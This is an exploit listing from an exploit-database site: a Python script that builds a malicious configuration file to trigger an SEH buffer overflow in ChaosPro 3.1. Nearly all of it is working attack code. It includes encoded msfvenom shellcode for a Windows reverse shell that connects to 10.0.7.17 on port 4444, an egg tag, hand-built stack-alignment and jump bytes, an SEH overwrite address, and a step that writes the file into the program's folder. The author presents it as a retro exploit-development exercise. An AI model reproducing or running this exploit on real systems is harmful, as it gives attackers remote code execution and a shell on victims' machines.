Exploit for ChaosPro 3.1 SEH Buffer Overflow

Name: Exploit for ChaosPro 3.1 SEH Buffer Overflow
Rating: 5 (323 reviews)
2019-09-02 | CVSS 0.9
## https://sploitus.com/exploit?id=PACKETSTORM:154291
#!C:\Python27\python.exe  
  
# Title : ChaosPro 3.1  
# Twitter : @securitychops  
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html  
  
# our egg!  
payload = "T00WT00W"  
  
# adjust the stack from 00F2FFA6 to 00F2FFA8  
payload += "\x83\xC4\x02"  
  
#the payload  
payload += (  
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17   
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'  
"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"  
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"  
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"  
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"  
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"  
"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"  
"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"  
"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"  
"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"  
"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"  
"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"  
"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"  
"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"  
"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"  
"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"  
"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"  
"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"  
"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"  
"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"  
"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"  
"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"  
"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"  
"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"  
"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"  
"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"  
"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"  
"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"  
"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"  
"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"  
"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"  
"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"  
"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"  
"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"  
"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"  
"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"  
"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"  
"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"  
"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"  
"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"  
"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"  
"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"  
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"  
"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"  
"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"  
"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"  
"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"  
"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"  
"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"  
)  
  
#badchars  
#\x0a\x1a\x3b\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a  
#\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9  
#\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8  
#\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7  
#\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6  
#\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5  
#\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4  
#\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff  
  
# stack alignment  
pop_esp = "\x5c"  
pop_eax = "\x58"  
push_eax = "\x50"  
push_esp = "\x54"  
align_stack = "\x2d\x8f\x8e\x8d\x8c\x2d\x7e\x68\x71\x72\x2d\x01\x01\x01\x01"  
zero_eax = "\x25\x7e\x7e\x05\x7e\x25\x01\x01\x7a\x01"  
  
#this needs to be a backwards jump to give us room to call stack jump code  
jmpback80 = "\x40\x75\x80\x75"  
jmpforward06 = "\x40\x75\x06\x75"  
  
#line containing our payload  
line_start = "Username "  
line_start += payload + "\n"  
  
#line with our overflow  
line_start += "ProjectPath "  
junk = line_start  
  
#the buffer starts being overwritten with  
# our controlled values at 522  
junk += "A" * 522  
  
#junk += alpha_numeric_hex  
junk += "A" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06))  
#- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4)  
  
# baby nopsled  
junk += "A" * 9  
  
# ok, lets start working stuff here ... we have 126 bytesish ...   
junk += zero_eax  
junk += push_esp + pop_eax # push esp, pop eax  
junk += align_stack  
junk += push_eax  
junk += pop_esp  
  
# first section into the stack  
# e7 ff e4 75  
# good   
junk += zero_eax   
junk += "\x2d\x89\x88\x87\x86"  
junk += "\x2d\x01\x8f\x77\x8f"  
junk += "\x2d\x01\x04\x01\x02"  
junk += push_eax  
  
# second section into the stack  
# af e7 75 af  
# good  
junk += zero_eax   
junk += "\x2d\x4f\x4e\x4d\x4c"  
junk += "\x2d\x01\x39\x8f\x02"  
junk += "\x2d\x01\x03\x3c\x01"  
junk += push_eax  
  
# third section into the stack  
# d7 89 57 30  
# good  
junk += zero_eax   
junk += "\x2d\x8f\x8e\x74\x73"  
junk += "\x2d\x3e\x19\x01\x8f"  
junk += "\x2d\x03\x01\x01\x26"  
junk += push_eax  
  
# size for section one  
junk += "A" * (  
126  
- 9 # nopsled  
  
# aligning the stack  
- len(zero_eax)   
- len(push_esp)   
- len(pop_eax)   
- len(align_stack)   
- len(push_eax)   
- len(pop_esp)   
  
# first set of bytes going onto the stack  
- len(zero_eax)  
- 15   
- len(push_eax)  
  
# second set of bytes going onto the stack  
- len(zero_eax)  
- 15  
- len(push_eax)  
  
# third set of bytes going onto the stack  
- len(zero_eax)  
- 15  
- len(push_eax)   
)  
  
# baby nopslep just for breathing room  
junk += "AAAA"  
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)  
junk += jmpforward06  
junk += jmpback80  
  
#Section Two  
  
# baby nopsled  
junk += "AAA"   
  
# fourth section into the stack part two  
# 30 54 b8 ec  
# fourth section into the stack part one  
junk += zero_eax   
junk += "\x2d\x80\x15\x75\x75"  
junk += "\x2d\x80\x20\x32\x35"  
junk += "\x2d\x14\x11\x04\x25"  
junk += push_eax  
  
# fifth section into the stack  
# 74 5a 05 3c  
# good  
junk += zero_eax   
junk += "\x2d\x8f\x8e\x8d\x89"  
junk += "\x2d\x34\x6b\x17\x01"  
junk += "\x2d\x01\x01\x01\x01"  
junk += push_eax  
  
# sixth section into the stack  
# 2e cd 58 53  
# good   
junk += zero_eax   
junk += "\x2d\x8f\x8e\x8d\x8c"  
junk += "\x2d\x1d\x18\x8e\x43"  
junk += "\x2d\x01\x01\x17\x01"  
junk += push_eax  
  
# seventh section into the stack  
# 43 43 db 31  
# good  
junk += zero_eax   
junk += "\x2d\x8f\x8e\x8d\x8c"  
junk += "\x2d\x3e\x7f\x2d\x2d"  
junk += "\x2d\x02\x17\x01\x03"  
junk += push_eax  
  
junk += "A" * (  
126 # amount of room before we need to jump  
  
- 3 # baby nopsled  
  
# part one of fourth set of bytes going onto the stack  
- len(zero_eax)   
  
# part two of fourth sec of bytes going onto the stack  
- 15  
- len(push_eax)  
  
# fifth set of bytes going onto the stack  
- len(zero_eax)  
- 15  
- len(push_eax)  
  
# sixth set of bytes going onto the stack  
- len(zero_eax)  
- 15  
- len(push_eax)  
  
# seventh set of bytes going onto the stack  
- len(zero_eax)  
- 15  
- len(push_eax)   
  
- 4 # baby nopsled   
- len(jmpback80)  
)  
  
# Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)  
junk += jmpforward06  
junk += jmpback80  
  
# baby nopsled  
junk += "AAAA"  
  
# eighth section into the stack part two  
# 52 42 0f ff  
# good  
# eighth section into the stack part one  
junk += zero_eax   
junk += "\x2d\x65\x65\x75\x75"  
junk += "\x2d\x65\x65\x25\x25"  
junk += "\x2d\x37\x25\x23\x13"  
junk += push_eax  
  
# ninth section into the stack  
# ca 81 66 43  
# good  
junk += zero_eax   
junk += "\x2d\x8f\x81\x7c\x7b"  
junk += "\x2d\x2d\x17\x01\x8f"  
junk += "\x2d\x01\x01\x01\x2b"  
junk += push_eax  
  
junk += "A" * (  
126 # amount of room before we need to jump  
  
- len(jmpback80)  
  
- 4 # baby nopsled  
  
# eighth set of bytes going onto the stack  
# eighth section  
- len(zero_eax)  
- 15  
- len(push_eax)   
  
# ninth set of bytes going onto the stack  
- len(zero_eax)  
- 15  
- len(push_eax)  
  
- len(jmpforward06)  
)  
  
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)  
junk += jmpforward06  
junk += jmpback80  
  
#seh address for pop, pop and ret with a 0x00 at the end ...   
junk += "\x5d\x10\x40"  
  
# write the evil file  
with open('C:\\Program Files\\ChaosPro3.1\\ChaosPro.cfg', 'w') as the_file:  
the_file.write(junk)